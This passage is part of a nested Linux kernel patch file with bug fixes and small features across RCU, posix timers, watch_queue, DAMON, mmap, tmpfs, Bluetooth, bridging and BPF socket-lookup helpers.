+@@ -4239,7 +4249,6 @@ void rcu_cpu_starting(unsigned int cpu)
+ 
+ 	rnp = rdp->mynode;
+ 	mask = rdp->grpmask;
+-	local_irq_save(flags);
+ 	arch_spin_lock(&rcu_state.ofl_lock);
+ 	rcu_dynticks_eqs_online();
+ 	raw_spin_lock(&rcu_state.barrier_lock);
+@@ -4258,17 +4267,17 @@ void rcu_cpu_starting(unsigned int cpu)
+ 	/* An incoming CPU should never be blocking a grace period. */
+ 	if (WARN_ON_ONCE(rnp->qsmask & mask)) { /* RCU waiting on incoming CPU? */
+ 		/* rcu_report_qs_rnp() *really* wants some flags to restore */
+-		unsigned long flags2;
++		unsigned long flags;
+ 
+-		local_irq_save(flags2);
++		local_irq_save(flags);
+ 		rcu_disable_urgency_upon_qs(rdp);
+ 		/* Report QS -after- changing ->qsmaskinitnext! */
+-		rcu_report_qs_rnp(mask, rnp, rnp->gp_seq, flags2);
++		rcu_report_qs_rnp(mask, rnp, rnp->gp_seq, flags);
+ 	} else {
+ 		raw_spin_unlock_rcu_node(rnp);
+ 	}
+ 	arch_spin_unlock(&rcu_state.ofl_lock);
+-	local_irq_restore(flags);
++	smp_store_release(&rdp->beenonline, true);
+ 	smp_mb(); /* Ensure RCU read-side usage follows above initialization. */
+ }
+ 
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 808a247205a9a..ed3c4a9543982 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -1037,27 +1037,52 @@ retry_delete:
+ }
+ 
+ /*
+- * return timer owned by the process, used by exit_itimers
++ * Delete a timer if it is armed, remove it from the hash and schedule it
++ * for RCU freeing.
+  */
+ static void itimer_delete(struct k_itimer *timer)
+ {
+-retry_delete:
+-	spin_lock_irq(&timer->it_lock);
++	unsigned long flags;
++
++	/*
++	 * irqsave is required to make timer_wait_running() work.
++	 */
++	spin_lock_irqsave(&timer->it_lock, flags);
+ 
++retry_delete:
++	/*
++	 * Even if the timer is not longer accessible from other tasks
++	 * it still might be armed and queued in the underlying timer
++	 * mechanism. Worse, that timer mechanism might run the expiry
++	 * function concurrently.
++	 */
+ 	if (timer_delete_hook(timer) == TIMER_RETRY) {
+-		spin_unlock_irq(&timer->it_lock);
++		/*
++		 * Timer is expired concurrently, prevent livelocks
++		 * and pointless spinning on RT.
++		 *
++		 * timer_wait_running() drops timer::it_lock, which opens
++		 * the possibility for another task to delete the timer.
++		 *
++		 * That's not possible here because this is invoked from
++		 * do_exit() only for the last thread of the thread group.
++		 * So no other task can access and delete that timer.
++		 */
++		if (WARN_ON_ONCE(timer_wait_running(timer, &flags) != timer))
++			return;
++
+ 		goto retry_delete;
+ 	}
+ 	list_del(&timer->list);
+ 
+-	spin_unlock_irq(&timer->it_lock);
++	spin_unlock_irqrestore(&timer->it_lock, flags);
+ 	release_posix_timer(timer, IT_ID_SET);
+ }
+ 
+ /*
+- * This is called by do_exit or de_thread, only when nobody else can
+- * modify the signal->posix_timers list. Yet we need sighand->siglock
+- * to prevent the race with /proc/pid/timers.
++ * Invoked from do_exit() when the last thread of a thread group exits.
++ * At that point no other task can access the timers of the dying
++ * task anymore.
+  */
+ void exit_itimers(struct task_struct *tsk)
+ {
+@@ -1067,10 +1092,12 @@ void exit_itimers(struct task_struct *tsk)
+ 	if (list_empty(&tsk->signal->posix_timers))
+ 		return;
+ 
++	/* Protect against concurrent read via /proc/$PID/timers */
+ 	spin_lock_irq(&tsk->sighand->siglock);
+ 	list_replace_init(&tsk->signal->posix_timers, &timers);
+ 	spin_unlock_irq(&tsk->sighand->siglock);
+ 
++	/* The timers are not longer accessible via tsk::signal */
+ 	while (!list_empty(&timers)) {
+ 		tmr = list_first_entry(&timers, struct k_itimer, list);
+ 		itimer_delete(tmr);
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index d6fb6a676bbbb..1ad89eec2a55f 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1046,7 +1046,7 @@ static bool report_idle_softirq(void)
+ 			return false;
+ 	}
+ 
+-	if (ratelimit < 10)
++	if (ratelimit >= 10)
+ 		return false;
+ 
+ 	/* On RT, softirqs handling may be waiting on some lock */
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index f10f403104e7d..28ed71d277bd7 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -43,7 +43,7 @@ MODULE_LICENSE("GPL");
+ static inline bool lock_wqueue(struct watch_queue *wqueue)
+ {
+ 	spin_lock_bh(&wqueue->lock);
+-	if (unlikely(wqueue->defunct)) {
++	if (unlikely(!wqueue->pipe)) {
+ 		spin_unlock_bh(&wqueue->lock);
+ 		return false;
+ 	}
+@@ -105,9 +105,6 @@ static bool post_one_notification(struct watch_queue *wqueue,
+ 	unsigned int head, tail, mask, note, offset, len;
+ 	bool done = false;
+ 
+-	if (!pipe)
+-		return false;
+-
+ 	spin_lock_irq(&pipe->rd_wait.lock);
+ 
+ 	mask = pipe->ring_size - 1;
+@@ -604,8 +601,11 @@ void watch_queue_clear(struct watch_queue *wqueue)
+ 	rcu_read_lock();
+ 	spin_lock_bh(&wqueue->lock);
+ 
+-	/* Prevent new notifications from being stored. */
+-	wqueue->defunct = true;
++	/*
++	 * This pipe can be freed by callers like free_pipe_info().
++	 * Removing this reference also prevents new notifications.
++	 */
++	wqueue->pipe = NULL;
+ 
+ 	while (!hlist_empty(&wqueue->watches)) {
+ 		watch = hlist_entry(wqueue->watches.first, struct watch, queue_node);
+diff --git a/kernel/watchdog_hld.c b/kernel/watchdog_hld.c
+index 247bf0b1582ca..1e8a49dc956e2 100644
+--- a/kernel/watchdog_hld.c
++++ b/kernel/watchdog_hld.c
+@@ -114,14 +114,14 @@ static void watchdog_overflow_callback(struct perf_event *event,
+ 	/* Ensure the watchdog never gets throttled */
+ 	event->hw.interrupts = 0;
+ 
++	if (!watchdog_check_timestamp())
++		return;
++
+ 	if (__this_cpu_read(watchdog_nmi_touch) == true) {
+ 		__this_cpu_write(watchdog_nmi_touch, false);
+ 		return;
+ 	}
+ 
+-	if (!watchdog_check_timestamp())
+-		return;
+-
+ 	/* check for a hardlockup
+ 	 * This is done by making sure our timer interrupt
+ 	 * is incrementing.  The timer interrupt should have
+diff --git a/lib/bitmap.c b/lib/bitmap.c
+index 1c81413c51f86..ddb31015e38ae 100644
+--- a/lib/bitmap.c
++++ b/lib/bitmap.c
+@@ -1495,7 +1495,7 @@ void bitmap_to_arr32(u32 *buf, const unsigned long *bitmap, unsigned int nbits)
+ EXPORT_SYMBOL(bitmap_to_arr32);
+ #endif
+ 
+-#if (BITS_PER_LONG == 32) && defined(__BIG_ENDIAN)
++#if BITS_PER_LONG == 32
+ /**
+  * bitmap_from_arr64 - copy the contents of u64 array of bits to bitmap
+  *	@bitmap: array of unsigned longs, the destination bitmap
+diff --git a/lib/ts_bm.c b/lib/ts_bm.c
+index 1f2234221dd11..c8ecbf74ef295 100644
+--- a/lib/ts_bm.c
++++ b/lib/ts_bm.c
+@@ -60,10 +60,12 @@ static unsigned int bm_find(struct ts_config *conf, struct ts_state *state)
+ 	struct ts_bm *bm = ts_config_priv(conf);
+ 	unsigned int i, text_len, consumed = state->offset;
+ 	const u8 *text;
+-	int shift = bm->patlen - 1, bs;
++	int bs;
+ 	const u8 icase = conf->flags & TS_IGNORECASE;
+ 
+ 	for (;;) {
++		int shift = bm->patlen - 1;
++
+ 		text_len = conf->get_next_block(consumed, &text, conf, state);
+ 
+ 		if (unlikely(text_len == 0))
+diff --git a/mm/damon/ops-common.c b/mm/damon/ops-common.c
+index 75409601f9349..13b99975cbc2c 100644
+--- a/mm/damon/ops-common.c
++++ b/mm/damon/ops-common.c
+@@ -33,7 +33,7 @@ struct page *damon_get_page(unsigned long pfn)
+ 	return page;
+ }
+ 
+-void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr)
++void damon_ptep_mkold(pte_t *pte, struct vm_area_struct *vma, unsigned long addr)
+ {
+ 	bool referenced = false;
+ 	struct page *page = damon_get_page(pte_pfn(*pte));
+@@ -41,13 +41,11 @@ void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr)
+ 	if (!page)
+ 		return;
+ 
+-	if (pte_young(*pte)) {
++	if (ptep_test_and_clear_young(vma, addr, pte))
+ 		referenced = true;
+-		*pte = pte_mkold(*pte);
+-	}
+ 
+ #ifdef CONFIG_MMU_NOTIFIER
+-	if (mmu_notifier_clear_young(mm, addr, addr + PAGE_SIZE))
++	if (mmu_notifier_clear_young(vma->vm_mm, addr, addr + PAGE_SIZE))
+ 		referenced = true;
+ #endif /* CONFIG_MMU_NOTIFIER */
+ 
+@@ -58,7 +56,7 @@ void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr)
+ 	put_page(page);
+ }
+ 
+-void damon_pmdp_mkold(pmd_t *pmd, struct mm_struct *mm, unsigned long addr)
++void damon_pmdp_mkold(pmd_t *pmd, struct vm_area_struct *vma, unsigned long addr)
+ {
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ 	bool referenced = false;
+@@ -67,13 +65,11 @@ void damon_pmdp_mkold(pmd_t *pmd, struct mm_struct *mm, unsigned long addr)
+ 	if (!page)
+ 		return;
+ 
+-	if (pmd_young(*pmd)) {
++	if (pmdp_test_and_clear_young(vma, addr, pmd))
+ 		referenced = true;
+-		*pmd = pmd_mkold(*pmd);
+-	}
+ 
+ #ifdef CONFIG_MMU_NOTIFIER
+-	if (mmu_notifier_clear_young(mm, addr, addr + HPAGE_PMD_SIZE))
++	if (mmu_notifier_clear_young(vma->vm_mm, addr, addr + HPAGE_PMD_SIZE))
+ 		referenced = true;
+ #endif /* CONFIG_MMU_NOTIFIER */
+ 
+diff --git a/mm/damon/ops-common.h b/mm/damon/ops-common.h
+index 8d82d37222042..e062a8874e411 100644
+--- a/mm/damon/ops-common.h
++++ b/mm/damon/ops-common.h
+@@ -9,8 +9,8 @@
+ 
+ struct page *damon_get_page(unsigned long pfn);
+ 
+-void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr);
+-void damon_pmdp_mkold(pmd_t *pmd, struct mm_struct *mm, unsigned long addr);
++void damon_ptep_mkold(pte_t *pte, struct vm_area_struct *vma, unsigned long addr);
++void damon_pmdp_mkold(pmd_t *pmd, struct vm_area_struct *vma, unsigned long addr);
+ 
+ int damon_cold_score(struct damon_ctx *c, struct damon_region *r,
+ 			struct damos *s);
+diff --git a/mm/damon/paddr.c b/mm/damon/paddr.c
+index 402d30b37aba9..7bc8d79c7fa07 100644
+--- a/mm/damon/paddr.c
++++ b/mm/damon/paddr.c
+@@ -24,9 +24,9 @@ static bool __damon_pa_mkold(struct folio *folio, struct vm_area_struct *vma,
+ 	while (page_vma_mapped_walk(&pvmw)) {
+ 		addr = pvmw.address;
+ 		if (pvmw.pte)
+-			damon_ptep_mkold(pvmw.pte, vma->vm_mm, addr);
++			damon_ptep_mkold(pvmw.pte, vma, addr);
+ 		else
+-			damon_pmdp_mkold(pvmw.pmd, vma->vm_mm, addr);
++			damon_pmdp_mkold(pvmw.pmd, vma, addr);
+ 	}
+ 	return true;
+ }
+diff --git a/mm/damon/vaddr.c b/mm/damon/vaddr.c
+index 15f03df66db60..26d561af74e41 100644
+--- a/mm/damon/vaddr.c
++++ b/mm/damon/vaddr.c
+@@ -311,7 +311,7 @@ static int damon_mkold_pmd_entry(pmd_t *pmd, unsigned long addr,
+ 		}
+ 
+ 		if (pmd_trans_huge(*pmd)) {
+-			damon_pmdp_mkold(pmd, walk->mm, addr);
++			damon_pmdp_mkold(pmd, walk->vma, addr);
+ 			spin_unlock(ptl);
+ 			return 0;
+ 		}
+@@ -323,7 +323,7 @@ static int damon_mkold_pmd_entry(pmd_t *pmd, unsigned long addr,
+ 	pte = pte_offset_map_lock(walk->mm, pmd, addr, &ptl);
+ 	if (!pte_present(*pte))
+ 		goto out;
+-	damon_ptep_mkold(pte, walk->mm, addr);
++	damon_ptep_mkold(pte, walk->vma, addr);
+ out:
+ 	pte_unmap_unlock(pte, ptl);
+ 	return 0;
+diff --git a/mm/memory.c b/mm/memory.c
+index 77549434d13a7..2083078cd0615 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3980,6 +3980,13 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 		}
+ 	}
+ 
++	/*
++	 * Some architectures may have to restore extra metadata to the page
++	 * when reading from swap. This metadata may be indexed by swap entry
++	 * so this must be called before swap_free().
++	 */
++	arch_swap_restore(entry, folio);
++
+ 	/*
+ 	 * Remove the swap entry and conditionally try to free up the swapcache.
+ 	 * We're already holding a reference on the page but haven't mapped it
+diff --git a/mm/mmap.c b/mm/mmap.c
+index b8af52db3bbe0..41a240bd81df8 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -767,7 +767,8 @@ int __vma_adjust(struct vm_area_struct *vma, unsigned long start,
+ 	}
+ 	if (end != vma->vm_end) {
+ 		if (vma->vm_end > end) {
+-			if (!insert || (insert->vm_start != end)) {
++			if ((vma->vm_end + adjust_next != end) &&
++			    (!insert || (insert->vm_start != end))) {
+ 				vma_mas_szero(&mas, end, vma->vm_end);
+ 				mas_reset(&mas);
+ 				VM_WARN_ON(insert &&
+@@ -2484,7 +2485,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 			error = mas_store_gfp(&mas_detach, split, GFP_KERNEL);
+ 			if (error)
+ 				goto munmap_gather_failed;
+-			if (next->vm_flags & VM_LOCKED)
++			if (split->vm_flags & VM_LOCKED)
+ 				locked_vm += vma_pages(split);
+ 
+ 			count++;
+diff --git a/mm/shmem.c b/mm/shmem.c
+index a8d9fd039d0aa..aba041a3df739 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -4137,7 +4137,7 @@ static struct file_system_type shmem_fs_type = {
+ 	.name		= "tmpfs",
+ 	.init_fs_context = ramfs_init_fs_context,
+ 	.parameters	= ramfs_fs_parameters,
+-	.kill_sb	= kill_litter_super,
++	.kill_sb	= ramfs_kill_sb,
+ 	.fs_flags	= FS_USERNS_MOUNT,
+ };
+ 
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index ab9f00252dc2a..fef09d2121384 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -770,6 +770,11 @@ static void le_conn_timeout(struct work_struct *work)
+ 	hci_abort_conn(conn, HCI_ERROR_REMOTE_USER_TERM);
+ }
+ 
++struct iso_cig_params {
++	struct hci_cp_le_set_cig_params cp;
++	struct hci_cis_params cis[0x1f];
++};
++
+ struct iso_list_data {
+ 	union {
+ 		u8  cig;
+@@ -781,10 +786,7 @@ struct iso_list_data {
+ 		u16 sync_handle;
+ 	};
+ 	int count;
+-	struct {
+-		struct hci_cp_le_set_cig_params cp;
+-		struct hci_cis_params cis[0x11];
+-	} pdu;
++	struct iso_cig_params pdu;
+ };
+ 
+ static void bis_list(struct hci_conn *conn, void *data)
+@@ -1705,10 +1707,33 @@ static int hci_le_create_big(struct hci_conn *conn, struct bt_iso_qos *qos)
+ 	return hci_send_cmd(hdev, HCI_OP_LE_CREATE_BIG, sizeof(cp), &cp);
+ }
+ 
++static void set_cig_params_complete(struct hci_dev *hdev, void *data, int err)
++{
++	struct iso_cig_params *pdu = data;
++
++	bt_dev_dbg(hdev, "");
++
++	if (err)
++		bt_dev_err(hdev, "Unable to set CIG parameters: %d", err);
++
++	kfree(pdu);
++}
++
++static int set_cig_params_sync(struct hci_dev *hdev, void *data)
++{
++	struct iso_cig_params *pdu = data;
++	u32 plen;
++
++	plen = sizeof(pdu->cp) + pdu->cp.num_cis * sizeof(pdu->cis[0]);
++	return __hci_cmd_sync_status(hdev, HCI_OP_LE_SET_CIG_PARAMS, plen, pdu,
++				     HCI_CMD_TIMEOUT);
++}
++
+ static bool hci_le_set_cig_params(struct hci_conn *conn, struct bt_iso_qos *qos)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 	struct iso_list_data data;
++	struct iso_cig_params *pdu;
+ 
+ 	memset(&data, 0, sizeof(data));
+ 
+@@ -1779,12 +1804,18 @@ static bool hci_le_set_cig_params(struct hci_conn *conn, struct bt_iso_qos *qos)
+ 	if (qos->cis == BT_ISO_QOS_CIS_UNSET || !data.pdu.cp.num_cis)
+ 		return false;
+ 
+-	if (hci_send_cmd(hdev, HCI_OP_LE_SET_CIG_PARAMS,
+-			 sizeof(data.pdu.cp) +
+-			 (data.pdu.cp.num_cis * sizeof(*data.pdu.cis)),
+-			 &data.pdu) < 0)
++	pdu = kzalloc(sizeof(*pdu), GFP_KERNEL);
++	if (!pdu)
+ 		return false;
+ 
++	memcpy(pdu, &data.pdu, sizeof(*pdu));
++
++	if (hci_cmd_sync_queue(hdev, set_cig_params_sync, pdu,
++			       set_cig_params_complete) < 0) {
++		kfree(pdu);
++		return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 21416ccc30ab2..b272cc1f36481 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -6307,23 +6307,18 @@ static void process_adv_report(struct hci_dev *hdev, u8 type, bdaddr_t *bdaddr,
+ 		return;
+ 	}
+ 
+-	/* When receiving non-connectable or scannable undirected
+-	 * advertising reports, this means that the remote device is
+-	 * not connectable and then clearly indicate this in the
+-	 * device found event.
+-	 *
+-	 * When receiving a scan response, then there is no way to
++	/* When receiving a scan response, then there is no way to
+ 	 * know if the remote device is connectable or not. However
+ 	 * since scan responses are merged with a previously seen
+ 	 * advertising report, the flags field from that report
+ 	 * will be used.
+ 	 *
+-	 * In the really unlikely case that a controller get confused
+-	 * and just sends a scan response event, then it is marked as
+-	 * not connectable as well.
++	 * In the unlikely case that a controller just sends a scan
++	 * response event that doesn't match the pending report, then
++	 * it is marked as a standalone SCAN_RSP.
+ 	 */
+ 	if (type == LE_ADV_SCAN_RSP)
+-		flags = MGMT_DEV_FOUND_NOT_CONNECTABLE;
++		flags = MGMT_DEV_FOUND_SCAN_RSP;
+ 
+ 	/* If there's nothing pending either store the data from this
+ 	 * event or send an immediate device found event if the data
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 1805ddee0cd02..37131a36700a1 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4567,23 +4567,17 @@ static int hci_dev_setup_sync(struct hci_dev *hdev)
+ 	invalid_bdaddr = test_bit(HCI_QUIRK_INVALID_BDADDR, &hdev->quirks);
+ 
+ 	if (!ret) {
+-		if (test_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks)) {
+-			if (!bacmp(&hdev->public_addr, BDADDR_ANY))
+-				hci_dev_get_bd_addr_from_property(hdev);
+-
+-			if (bacmp(&hdev->public_addr, BDADDR_ANY) &&
+-			    hdev->set_bdaddr) {
+-				ret = hdev->set_bdaddr(hdev,
+-						       &hdev->public_addr);
+-
+-				/* If setting of the BD_ADDR from the device
+-				 * property succeeds, then treat the address
+-				 * as valid even if the invalid BD_ADDR
+-				 * quirk indicates otherwise.
+-				 */
+-				if (!ret)
+-					invalid_bdaddr = false;
+-			}
++		if (test_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks) &&
++		    !bacmp(&hdev->public_addr, BDADDR_ANY))
++			hci_dev_get_bd_addr_from_property(hdev);
++
++		if ((invalid_bdaddr ||
++		     test_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks)) &&
++		    bacmp(&hdev->public_addr, BDADDR_ANY) &&
++		    hdev->set_bdaddr) {
++			ret = hdev->set_bdaddr(hdev, &hdev->public_addr);
++			if (!ret)
++				invalid_bdaddr = false;
+ 		}
+ 	}
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index fc4ba0884da96..815f2abe918ef 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -859,6 +859,12 @@ static u32 get_supported_settings(struct hci_dev *hdev)
+ 	    hdev->set_bdaddr)
+ 		settings |= MGMT_SETTING_CONFIGURATION;
+ 
++	if (cis_central_capable(hdev))
++		settings |= MGMT_SETTING_CIS_CENTRAL;
++
++	if (cis_peripheral_capable(hdev))
++		settings |= MGMT_SETTING_CIS_PERIPHERAL;
++
+ 	settings |= MGMT_SETTING_PHY_CONFIGURATION;
+ 
+ 	return settings;
+@@ -932,6 +938,12 @@ static u32 get_current_settings(struct hci_dev *hdev)
+ 	if (hci_dev_test_flag(hdev, HCI_WIDEBAND_SPEECH_ENABLED))
+ 		settings |= MGMT_SETTING_WIDEBAND_SPEECH;
+ 
++	if (cis_central_capable(hdev))
++		settings |= MGMT_SETTING_CIS_CENTRAL;
++
++	if (cis_peripheral_capable(hdev))
++		settings |= MGMT_SETTING_CIS_PERIPHERAL;
++
+ 	return settings;
+ }
+ 
+diff --git a/net/bridge/br_if.c b/net/bridge/br_if.c
+index 228fd5b20f109..0989074f316ef 100644
+--- a/net/bridge/br_if.c
++++ b/net/bridge/br_if.c
+@@ -166,8 +166,9 @@ void br_manage_promisc(struct net_bridge *br)
+ 			 * This lets us disable promiscuous mode and write
+ 			 * this config to hw.
+ 			 */
+-			if (br->auto_cnt == 0 ||
+-			    (br->auto_cnt == 1 && br_auto_port(p)))
++			if ((p->dev->priv_flags & IFF_UNICAST_FLT) &&
++			    (br->auto_cnt == 0 ||
++			     (br->auto_cnt == 1 && br_auto_port(p))))
+ 				br_port_clear_promisc(p);
+ 			else
+ 				br_port_set_promisc(p);
+diff --git a/net/core/filter.c b/net/core/filter.c
+index b79a070fa8246..da71e6812ab51 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -6474,12 +6474,11 @@ static struct sock *sk_lookup(struct net *net, struct bpf_sock_tuple *tuple,
+ static struct sock *
+ __bpf_skc_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 		 struct net *caller_net, u32 ifindex, u8 proto, u64 netns_id,
+-		 u64 flags)
++		 u64 flags, int sdif)
+ {
+ 	struct sock *sk = NULL;
+ 	struct net *net;
+ 	u8 family;
+-	int sdif;
+ 
+ 	if (len == sizeof(tuple->ipv4))
+ 		family = AF_INET;
+@@ -6491,10 +6490,12 @@ __bpf_skc_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 	if (unlikely(flags || !((s32)netns_id < 0 || netns_id <= S32_MAX)))
+ 		goto out;
+ 
+-	if (family == AF_INET)
+-		sdif = inet_sdif(skb);
+-	else
+-		sdif = inet6_sdif(skb);
++	if (sdif < 0) {
++		if (family == AF_INET)
++			sdif = inet_sdif(skb);
++		else
++			sdif = inet6_sdif(skb);
++	}
+ 
+ 	if ((s32)netns_id < 0) {
+ 		net = caller_net;
+@@ -6514,10 +6515,11 @@ out:
+ static struct sock *
+ __bpf_sk_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 		struct net *caller_net, u32 ifindex, u8 proto, u64 netns_id,
+-		u64 flags)
++		u64 flags, int sdif)
+ {
+ 	struct sock *sk = __bpf_skc_lookup(skb, tuple, len, caller_net,
+-					   ifindex, proto, netns_id, flags);
++					   ifindex, proto, netns_id, flags,
++					   sdif);
+ 
+ 	if (sk) {
+ 		struct sock *sk2 = sk_to_full_sk(sk);
+@@ -6557,7 +6559,7 @@ bpf_skc_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 	}
+ 
+ 	return __bpf_skc_lookup(skb, tuple, len, caller_net, ifindex, proto,
+-				netns_id, flags);
++				netns_id, flags, -1);
+ }
+ 
+ static struct sock *
+@@ -6646,6 +6648,78 @@ static const struct bpf_func_proto bpf_sk_lookup_udp_proto = {
+ 	.arg5_type	= ARG_ANYTHING,
+ };
+ 
++BPF_CALL_5(bpf_tc_skc_lookup_tcp, struct sk_buff *, skb,
++	   struct bpf_sock_tuple *, tuple, u32, len, u64, netns_id, u64, flags)
++{
++	struct net_device *dev = skb->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
++
++	return (unsigned long)__bpf_skc_lookup(skb, tuple, len, caller_net,
++					       ifindex, IPPROTO_TCP, netns_id,
++					       flags, sdif);
++}
++
++static const struct bpf_func_proto bpf_tc_skc_lookup_tcp_proto = {
++	.func		= bpf_tc_skc_lookup_tcp,
++	.gpl_only	= false,
++	.pkt_access	= true,
++	.ret_type	= RET_PTR_TO_SOCK_COMMON_OR_NULL,
++	.arg1_type	= ARG_PTR_TO_CTX,
++	.arg2_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
++	.arg3_type	= ARG_CONST_SIZE,
++	.arg4_type	= ARG_ANYTHING,
++	.arg5_type	= ARG_ANYTHING,
++};
++
++BPF_CALL_5(bpf_tc_sk_lookup_tcp, struct sk_buff *, skb,
++	   struct bpf_sock_tuple *, tuple, u32, len, u64, netns_id, u64, flags)
++{
++	struct net_device *dev = skb->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
++
++	return (unsigned long)__bpf_sk_lookup(skb, tuple, len, caller_net,
++					      ifindex, IPPROTO_TCP, netns_id,
++					      flags, sdif);
++}
++
++static const struct bpf_func_proto bpf_tc_sk_lookup_tcp_proto = {
++	.func		= bpf_tc_sk_lookup_tcp,
++	.gpl_only	= false,
++	.pkt_access	= true,
++	.ret_type	= RET_PTR_TO_SOCKET_OR_NULL,
++	.arg1_type	= ARG_PTR_TO_CTX,
++	.arg2_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
++	.arg3_type	= ARG_CONST_SIZE,
++	.arg4_type	= ARG_ANYTHING,
++	.arg5_type	= ARG_ANYTHING,
++};
++
++BPF_CALL_5(bpf_tc_sk_lookup_udp, struct sk_buff *, skb,
++	   struct bpf_sock_tuple *, tuple, u32, len, u64, netns_id, u64, flags)
++{
++	struct net_device *dev = skb->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
++
++	return (unsigned long)__bpf_sk_lookup(skb, tuple, len, caller_net,
++					      ifindex, IPPROTO_UDP, netns_id,
++					      flags, sdif);
++}
++
++static const struct bpf_func_proto bpf_tc_sk_lookup_udp_proto = {
++	.func		= bpf_tc_sk_lookup_udp,
++	.gpl_only	= false,
++	.pkt_access	= true,
++	.ret_type	= RET_PTR_TO_SOCKET_OR_NULL,
++	.arg1_type	= ARG_PTR_TO_CTX,
++	.arg2_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
++	.arg3_type	= ARG_CONST_SIZE,
++	.arg4_type	= ARG_ANYTHING,
++	.arg5_type	= ARG_ANYTHING,
++};
++
+ BPF_CALL_1(bpf_sk_release, struct sock *, sk)
+ {
+ 	if (sk && sk_is_refcounted(sk))
+@@ -6663,12 +6737,13 @@ static const struct bpf_func_proto bpf_sk_release_proto = {
+ BPF_CALL_5(bpf_xdp_sk_lookup_udp, struct xdp_buff *, ctx,
+ 	   struct bpf_sock_tuple *, tuple, u32, len, u32, netns_id, u64, flags)
+ {
+-	struct net *caller_net = dev_net(ctx->rxq->dev);
+-	int ifindex = ctx->rxq->dev->ifindex;
++	struct net_device *dev = ctx->rxq->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
+ 
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len, caller_net,
+ 					      ifindex, IPPROTO_UDP, netns_id,
+-					      flags);
++					      flags, sdif);
+ }
+ 
+ static const struct bpf_func_proto bpf_xdp_sk_lookup_udp_proto = {
+@@ -6686,12 +6761,13 @@ static const struct bpf_func_proto bpf_xdp_sk_lookup_udp_proto = {
+ BPF_CALL_5(bpf_xdp_skc_lookup_tcp, struct xdp_buff *, ctx,
+ 	   struct bpf_sock_tuple *, tuple, u32, len, u32, netns_id, u64, flags)
+ {
+-	struct net *caller_net = dev_net(ctx->rxq->dev);
+-	int ifindex = ctx->rxq->dev->ifindex;
++	struct net_device *dev = ctx->rxq->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
+ 
+ 	return (unsigned long)__bpf_skc_lookup(NULL, tuple, len, caller_net,
+ 					       ifindex, IPPROTO_TCP, netns_id,
+-					       flags);
++					       flags, sdif);
+ }
+ 
+ static const struct bpf_func_proto bpf_xdp_skc_lookup_tcp_proto = {
+@@ -6709,12 +6785,13 @@ static const struct bpf_func_proto bpf_xdp_skc_lookup_tcp_proto = {
+ BPF_CALL_5(bpf_xdp_sk_lookup_tcp, struct xdp_buff *, ctx,
+ 	   struct bpf_sock_tuple *, tuple, u32, len, u32, netns_id, u64, flags)
+ {
+-	struct net *caller_net = dev_net(ctx->rxq->dev);
+-	int ifindex = ctx->rxq->dev->ifindex;
++	struct net_device *dev = ctx->rxq->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
+ 
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len, caller_net,
+ 					      ifindex, IPPROTO_TCP, netns_id,
+-					      flags);
++					      flags, sdif);
+ }
+ 
+ static const struct bpf_func_proto bpf_xdp_sk_lookup_tcp_proto = {
+@@ -6734,7 +6811,8 @@ BPF_CALL_5(bpf_sock_addr_skc_lookup_tcp, struct bpf_sock_addr_kern *, ctx,
+ {
+ 	return (unsigned long)__bpf_skc_lookup(NULL, tuple, len,
